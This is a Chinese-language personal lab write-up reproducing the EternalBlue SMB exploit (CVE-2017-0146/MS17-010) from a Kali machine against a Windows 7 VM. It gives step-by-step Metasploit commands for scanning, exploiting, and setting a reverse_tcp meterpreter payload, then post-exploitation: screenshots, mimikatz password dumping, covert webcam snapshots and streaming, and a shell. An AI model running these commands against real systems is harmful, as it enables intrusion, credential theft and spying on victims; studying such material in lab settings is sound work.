[渗透笔记][漏洞复现] CVE-2017-0146(永恒之蓝)

所有内容仅作为个人学习和实验使用,请勿用于非法用途,后果自负!


第一次复现漏洞,感觉好好玩

永恒之蓝编号CVE-2017-0146,可通过MS17-010补丁修补此漏洞

CVE可以看成一个漏洞字典,用来给广泛认同的信息安全漏洞等提供一个公共的名称。通过使用同一个名称,可以在各自独立的漏洞库中起到一定的兼容性效果,并帮助在各个漏洞库中找到相关修补信息。

MS17-010是微软的一个安全类型的补丁,MS是微软的缩写。

永恒之蓝漏洞是一个针对SMB服务(端口号为445)进行攻击的漏洞,攻击者利用这个漏洞实现溢出从而能在目标系统上执行任意代码
SMB(全称是Server Message Block)是一个协议名,它能被用于Web连接、客户端与服务器之间的信息沟通。


漏洞复现

实验环境:
kali虚拟机(metasploit4.14.17版本以上), ip192.168.xx.140
win7虚拟机(开放445端口并且有永恒之蓝漏洞), ip 192.168.xx.141

实验目的:
kali机对win7虚拟机进行漏洞利用,获取目标靶机的信息

实验操作:

msfconsole启动metasploit

查询漏洞模块路径search ms17-010

使用扫描模块use auxiliary/scanner/smb/smb_ms17_010

设置rhostsset RHOSTS 192.168.xx.141

启动扫描exploit,成功扫描到目标主机
在这里插入图片描述
加载攻击模块use exploit/windows/smb/ms17_010_eternalblue

设置payload set payload windows/x64/meterpreter/reverse_tcp
要选用其他payload可以使用show payloads查看适合要攻击的目标主机的payload

设置本机的ip set LHOST 192.168.xx.140

设置目标ipset RHOSTS 192.168.xx.141

exploit后显示成功,并自动进入控制模式
[渗透笔记][漏洞复现] CVE-2017-0146(永恒之蓝)_第1张图片

通过meterpreter > screenshot可以截取对方屏幕信息。然后打开文件就可以看到截图了。

也可以载入mimikatz meterpreter > load mimikatz然后使用命令wdigest获取系统管理密码
[渗透笔记][漏洞复现] CVE-2017-0146(永恒之蓝)_第2张图片
还可通过meterpreter > webcam_stream打开对方的摄像头。

还有其他各种操作就看自己发挥了。

msf
screenshot //截图
webcam_list //查看目标机是否有摄像头
webcam_snap //打开目标摄像头,拍一张照片
webcam_stream //开启直播模式
shll //进入到目标机的shell下面
exit //停止meterpreter会话

你可能感兴趣的:(渗透笔记)